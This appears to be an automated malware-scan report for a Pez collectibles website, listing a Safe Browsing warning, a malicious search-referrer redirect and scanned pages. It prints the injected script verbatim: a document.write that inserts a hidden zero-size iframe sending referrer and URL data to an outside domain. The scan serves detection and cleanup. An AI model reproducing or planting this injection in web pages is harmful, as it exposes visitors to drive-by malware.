Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cheeseyscollectibles.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.cheeseyscollectibles.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.cheeseyscollectibles.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 08 Apr 2014 18:00:06 GMT Location: http://www.psheise.com/ncudim.cgi?3&seoref=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dwww.cheeseyscollectibles.com%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fwww.cheeseyscollectibles.com%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.cheeseyscollectibles.com%2F&default_keyword=test Server: Apache Vary: Referer,Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.cheeseyscollectibles.com/ | 200 OK Content-Length: 4859 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.psheise.com document.write('<iframe width="0" height="0" src="http://www.psheise.com/gav.cgi?3&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=test">'); Decoded script: <iframe width="0" height="0" src="http://www.psheise.com/gav.cgi?3&seoref=undefined¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=undefined&default_keyword=test"> Malicious iFrame found. The same iFrame was found in 5 websites. size: 0x0 src: http://www.psheise.com/gav.cgi?3&seoref= This URL is marked by Google as suspicious <iframe width="0" height="0" src="http://www.psheise.com/gav.cgi?3&seoref='+encodeuricomponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&http_referer='+encodeuricomponent(document.url)+'&default_keyword=test"> | ||
http://www.cheeseyscollectibles.com/index.html | 200 OK Content-Length: 4859 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.psheise.com document.write('<iframe width="0" height="0" src="http://www.psheise.com/gav.cgi?3&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=test">'); Decoded script: <iframe width="0" height="0" src="http://www.psheise.com/gav.cgi?3&seoref=undefined¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=undefined&default_keyword=test"> Malicious iFrame found. The same iFrame was found in 5 websites. size: 0x0 src: http://www.psheise.com/gav.cgi?3&seoref= This URL is marked by Google as suspicious <iframe width="0" height="0" src="http://www.psheise.com/gav.cgi?3&seoref='+encodeuricomponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&http_referer='+encodeuricomponent(document.url)+'&default_keyword=test"> | ||
http://www.cheeseyscollectibles.com/newrelease.html | 200 OK Content-Length: 300953 Content-Type: text/html | clean |
http://www.cheeseyscollectibles.com/vintagepez.html | 200 OK Content-Length: 20728 Content-Type: text/html | clean |
http://www.cheeseyscollectibles.com/olderpez.html | 200 OK Content-Length: 9384 Content-Type: text/html | clean |
http://www.cheeseyscollectibles.com/contactus.html | 200 OK Content-Length: 6136 Content-Type: text/html | clean |
http://www.cheeseyscollectibles.com/order.html | 200 OK Content-Length: 3934 Content-Type: text/html | clean |
http://www.cheeseyscollectibles.com/checkout/checkout_webform.xlsx | 200 OK Content-Length: 192233 Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet | clean |
http://www.cheeseyscollectibles.com/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |